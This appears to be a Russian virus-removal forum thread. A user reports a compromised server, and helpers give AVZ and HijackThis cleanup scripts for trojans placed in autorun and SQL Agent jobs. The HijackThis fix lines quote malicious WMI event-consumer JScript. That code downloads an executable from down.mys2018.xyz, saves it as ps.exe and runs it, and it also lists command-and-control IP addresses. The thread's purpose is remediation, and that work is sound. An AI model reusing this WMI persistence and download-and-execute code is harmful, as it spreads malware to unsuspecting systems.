Большое количество соединений с непонятными адресами и долгий вход в систему по утрам. [Trojan.Win32.Agentb.jagl, Trojan-Downloader.BAT.Agent.sk]

Printable View

05.09.2018, 21:52
Millka

Вложений: 4

Большое количество соединений с непонятными адресами и долгий вход в систему по утрам. [Trojan.Win32.Agentb.jagl, Trojan-Downloader.BAT.Agent.sk]

Добрый вечер! Проблема началась с того что приходили спецы из сбера подключить эквайринг и тыкались своими "общестенными флешками" везде в т.ч. в сервак куда никто никогда не допускался кроме руководителя. Руководитель без задней мысли дал им все доступы и те затащили на сервак троян. Который на след же день был обнаружен, и удален куреитом (Trojan.MulDrop8.29071). Но с того дня по утрам наблюдался долгий вход в систему (долго висит с сообщением работает служба пользователей) и высокая сетевая активность несколько раз выскакивали ошибки при подключении к mssql о переполнении сокета буфер мал и переполнен, открыл TPCView было куча подлючений с левых ip в статусе close_wait по PID выявил процесс снес этот файл (после на сокет не ругался больше), полез проверять автозагрузку увидел что в ней прописался батник снес его, предже сделал на всякий копию текста (приложил во вложении). на след день увидел опять кучу подключений у процесса msinfo.exe небольшую часть приложил на скрине. Решил поковыряться в базе в Агенте SQL Servera увидел задачи которых не было и обьявились они имено с того числа и часть из них напомнила имена папок из батника (Скрин приложил задачи в агенте отрубил по пока не удалял). Решил что лучше обратиться к более компетентным в этом вопросе людям, вот собственно я и тут) Заранее спасибо за уделенное время и помощь.
05.09.2018, 21:53
Info_bot

Уважаемый(ая) [B]Millka[/B], спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
05.09.2018, 22:20
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
TerminateProcessByName('c:\windows\system\msinfo.exe');
QuarantineFile('c:\windows\system\msinfo.exe', '');
QuarantineFile('c:\windows\system\my1.bat', '');
QuarantineFile('c:\windows\system32\wbem\123.bat', '');
QuarantineFileF('C:\Program Files\kugou2010', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js', true, '', 0, 0);
QuarantineFileF('C:\Program Files\shengda', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js', true, '', 0, 0);
DeleteFile('C:\Users\Администратор\WINDOWS\Tasks\my1.job', '64');
DeleteFile('c:\windows\system\msinfo.exe', '');
DeleteFile('c:\windows\system\my1.bat', '');
DeleteFile('c:\windows\system32\wbem\123.bat', '64');
DeleteFile('E:\autorun.inf', '');
ExecuteFile('schtasks.exe', '/delete /TN "my1" /F', 0, 15000, true);
DeleteFileMask('C:\Program Files\kugou2010', '*', true);
DeleteFileMask('C:\Program Files\shengda', '*', true);
DeleteDirectory('C:\Program Files\kugou2010');
DeleteDirectory('C:\Program Files\shengda');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run-', 'BGClients');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
end.[/code]Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: [fuckyoumm_consumer] fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)[/code]
[color=#FF0000]Пожалуйста, перезагрузите компьютер вручную.[/color]

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url] при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].
07.09.2018, 19:56
Millka

Вложений: 1

Скрипты выполнил, карантин прикрепил! AVZ в сообщениях выдал ошибку прямого доступа к одному из батников, это как раз был тот батник который я удалил и его текст в первом сообщении.

Скрипт после перезагрузки запустил но avz_log.txt прикрепить не могу форум не дает т.к. лимит по вложениям стоит его текст:

[code]Поиск критических уязвимостей
Отключён запрос UAC (контроля учётных записей) на повышение прав для администраторов.
[url]https://support.microsoft.com/ru-ru/help/17228/windows-protect-my-pc-from-viruses[/url]

Обнаружено уязвимостей: 1
[/code]

Образ автозапуска во вложении
07.09.2018, 20:22
Vvvyg

Порядок. Проявлений троянов больше не видно?
07.09.2018, 20:32
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]4[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\program files\shengda\cftmon.exe - [B]Trojan.Win32.Agentb.jagl[/B] ( AVAST4: Win32:Malware-gen )[*] c:\windows\system\msinfo.exe - [B]HEUR:Trojan.Win32.Generic[/B] ( AVAST4: Win32:Malware-gen )[*] c:\windows\system\my1.bat - [B]Trojan-Downloader.BAT.Agent.sk[/B][*] c:\windows\system32\wbem\123.bat - [B]Trojan-Downloader.BAT.Agent.sk[/B][/LIST][/LIST]